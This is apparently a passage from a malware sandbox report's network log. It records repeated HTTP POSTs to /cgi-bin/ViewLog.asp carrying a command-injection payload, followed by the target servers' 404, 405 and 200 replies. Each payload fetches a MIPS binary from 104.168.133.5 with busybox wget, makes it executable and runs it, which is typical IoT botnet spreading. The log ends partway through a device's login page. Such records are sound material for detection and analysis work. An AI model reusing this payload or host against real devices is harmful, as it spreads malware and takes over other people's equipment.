                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:24.614670992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:25.734698057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:28.038624048 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:32.646902084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.606601954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:01.062599897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:37.926456928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              83192.168.2.133920694.122.196.1228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:24.090281010 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              84192.168.2.134129694.121.120.918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:24.113650084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              85192.168.2.133331694.130.92.908080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.564101934 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:25.752986908 CET608INHTTP/1.1 404 Not Found
                                              Cache-Control: must-revalidate,no-cache,no-store
                                              Content-Type: text/html;charset=iso-8859-1
                                              Content-Length: 382
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              86192.168.2.134444031.184.211.548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.569591999 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:25.765096903 CET608INHTTP/1.1 404 Not Found
                                              Cache-Control: must-revalidate,no-cache,no-store
                                              Content-Type: text/html;charset=iso-8859-1
                                              Content-Length: 382
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              87192.168.2.135666685.227.225.1648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.576400995 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:25.795270920 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:15:25 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              88192.168.2.134892631.16.16.98080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.577754974 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:25.791138887 CET409INHTTP/1.1 405 Method Not Allowed
                                              Allow: OPTIONS, GET
                                              Content-Type: application/json; charset=UTF-8
                                              Vary: Origin
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              X-Xss-Protection: 1; mode=block
                                              Date: Thu, 23 Nov 2023 04:15:25 GMT
                                              Content-Length: 55
                                              Connection: close
                                              Data Raw: 7b 22 63 6f 64 65 22 3a 34 30 35 2c 22 6d 65 73 73 61 67 65 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 2e 22 2c 22 64 61 74 61 22 3a 7b 7d 7d 0a
                                              Data Ascii: {"code":405,"message":"Method Not Allowed.","data":{}}


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              89192.168.2.135009862.155.151.2218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.581605911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:25.796482086 CET1340INHTTP/1.0 200 OK
                                              Server: DEFAULT IP PLATFORM
                                              Content-type: text/html
                                              Expires: Fri, 10 Apr 2008 14:00:00 GMT
                                              Pragma: no-cache
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 3c 74 69 74 6c 65 3e 4d 44 54 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 47 6d 62 48 20 2d 20 4b 4e 58 2d 49 50 20 49 6e 74 65 72 66 61 63 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 67 66 74 2e 63 73 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 64 74 2e 64 65 22 20 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 6c 6f 67 6f 2e 67 69 66 22 20 62 6f 72 64 65 72 20 3d 20 22 30 22 20 61 6c 74 3d 22 4d 44 54 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 47 6d 62 48 22 20 74 69 74 6c 65 3d 22 4d 44 54 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 47 6d 62 48 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 4b 4e 58 2d 49 50 20 49 6e 74 65 72 66 61 63 65 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6e 61 76 22 3e 3c 64 69 76 20 69 64 3d 22 6e 61 76 68 22 3e 3c 2f 64 69 76 3e 0a 3c 75 6c 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 73 68 74 6d 6c 22 3e 44 65 76 69 63 65 20 49 6e 66 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6b 6e 78 2e 73 68 74 6d 6c 22 3e 50 72 6f 67 2e 20 4d 6f 64 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 65 6d 61 69 6c 2e 73 68 74 6d 6c 22 3e 45 6d 61 69 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6e 74 70 2e 73 68 74 6d 6c 22 3e 54 69 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 75 70 64 61 74 65 2e 73 68 74 6d 6c 22 3e 46 69 72 6d 77 61 72 65 20 55 70 64 61 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22 3e 3c 2f 70 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 22 3e 0a 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 70 61 73 73 77 6f 72 64 2e 63 67 69 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 61 63 63 65 70 74 2d 63 68 61 72 73 65 74 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 61 62 6c 65 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 31 30 22 3e 0a 3c 74 72 3e 3c 74 68 3e 59 6f 75 20 68 61 76 65 20 74 6f 